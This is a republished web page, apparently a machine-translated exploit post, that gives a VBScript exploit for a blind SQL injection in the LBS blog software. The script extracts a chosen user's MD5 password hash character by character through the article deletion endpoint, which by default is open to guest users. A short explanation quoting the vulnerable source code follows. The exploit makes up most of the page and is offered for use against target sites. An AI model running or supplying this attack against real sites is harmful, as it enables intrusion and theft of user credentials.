LBSblogsql injection vulnerability [Allversion]-official patch _ javascript skills

Source: Internet
Author: User
LBSblogsql injection vulnerability [Allversion]-official patches are available, but they only prove that the vulnerability exists.
Exp is as follows. Save it as vbs. Test yourself in the next program.

'From Jianxin
'================================================ ============================================
'Usage instructions:
'At the command prompt:
'Cscript.exe lbsblog. vbs: the blog path of the website to be attacked. Valid Article id: the password of the blog user to be cracked
For example:
'Cscript.exe lbsblog. vbs www.xxxx.com/blog/ 1 1
'By loveshell
'================================================ ============================================
On Error Resume Next
Dim oArgs
Dim olbsxml'xmlhttp object used to open the target URL
Dim targeturl' target URL
Dim userid, articleid 'blog Username
Dim TempStr 'store some obtained MD5 passwords
Dim charhex' defines hexadecimal characters
Dim charset

Set oArgs = WScript. arguments
If oArgs. count <1 Then Call ShowUsage ()


Set olbsXML = createObject ("Microsoft. XMLHTTP ")

'Fill in the complete target URL
TargetURL = oArgs (0)
If LCase (Left (TargetURL, 7) <> "http: //" Then TargetURL = "http: //" & TargetURL
If right (TargetURL, 1) <> "/" Then TargetURL = TargetURL &"/"
TargetURL = TargetURL & "article. asp"

Articleid = oArgs (1)
Userid = oArgs (2)
TempStr = ""
CharHex = Split (", a, B, c, d, e, f ",",")


WScript. echo "LBS blog All version Exploit" & vbcrlf
WScript. echo "By Jianxin" & vbcrlf
WScript. echo "http://www.loveshell.net/Just For fun :)" & vbcrlf
WScript. echo "+ Fuck the site now" & vbcrlf

Call main (TargetURL, BlogName)

Set oBokeXML = Nothing


'---------------------------------------------- Sub -------------------------------------------------------
'================================================ =====
'Function name: main
'Function function: main program, injection to obtain the password of the blog user
'================================================ =====
Sub main (TargetURL, BlogName)
Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
Postdata = ""
Postdata = articleid & "and (select left (user_password," & MainOffset & ") from blog_user where user_id =" & userid & ") = '" & TempStr & CharHex (SubOffset) &"'"

OpenURL = TargetURL

OlbsXML. open "Post", OpenURL, False ,"",""
OlbsXML. setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
OlbsXML. send "act = delete & id =" & escape (postdata)
GetPage = BytesToBstr (olbsXML. ResponseBody)
'Determine whether the accessed page exists
If InStr (GetPage, "deleted") <> 0 Then
'"The blog user does not exist or the entered information is incorrect" indicates an error mark. If this mark is returned, it indicates that the MD5 of the guess is incorrect.
'If you get the MD5 value of 0000000000000000, modify the error flag.
ElseIf InStr (GetPage, "permission") <> 0 Then
TempStr = TempStr & CharHex (SubOffset)
WScript. Echo "+ Crack now:" & TempStr
Exit
Else
WScript. echo vbcrlf & "Something error" & vbcrlf
WScript. echo vbcrlf & GetPage & vbcrlf
WScript. Quit
End If
Next
Next
WScript. Echo vbcrlf & "+ We Got It:" & TempStr & vbcrlf & ": P Don't Be edevil"
End sub

'================================================ =====
'Function name: BytesToBstr
'Function: Convert the content in the XMLHTTP object to GB2312 encoding.
'================================================ =====
Function BytesToBstr (body)
Dim objstream
Set objstream = createObject ("ADODB. Stream ")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = "GB2312"
BytesToBstr = objstream. ReadText
Objstream. Close
Set objstream = nothing
End Function

'==================================
'Function name: ShowUsage
'Function: usage tips
'==================================
Sub ShowUsage ()
WScript. echo "LBS blog Exploit" & vbcrlf & "By Loveshell/Jianxin"
WScript. echo "Usage:" & vbcrlf & "CScript" & WScript. ScriptFullName & "TargetURL BlogName"
WScript. echo "Example:" & vbcrlf & "CScript" & WScript. ScriptFullName & "http://www.loveshell.net/1"
WScript. echo ""
WScript. Quit
End Sub



Vulnerability description:

In src_article.asp
......
Input ["log_id"] = func. checkInt (input ["log_id"]);
If (! Input ["id"]) {
StrError = lang ["invalid_parameter"];
} Else {
// Check if the article exists
TheArticle. load ("log_id, log_authorID, log_catID", "log_id =" + input ["id"]);
StrError = false;
}
......


The log_id is filtered, but the id is used :)

What then?
Code in class/article. asp
This. load = function (strselect, strwhere ){
Var tmpA = connBlog. query ("select TOP 1" + strselect + "FROM [blog_Article] where" + strwhere );
If (tmpA ){
This. fill (tmpA [0]);
Return true;
} Else {
Return false;
}
}


I don't need to mention it, huh, huh, but the trigger requires conditions. It cannot be met!

Function articledelete (){
If (theUser. rights ["delete"] <1 ){
// Check User Right-without DB Query
PageHeader (lang ["error"]);
RedirectMessage (lang ["error"], lang ["no_rights"], lang ["goback"], "javascript: window. history. back (); ", false," errorbox ");
} Else {
Var theArticle = new lbsArticle ();
Var strError;



By default, all guest users have the delete permission. Although some judgment is made later, the injection has already taken place, and we just use his judgment to inject the injection.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.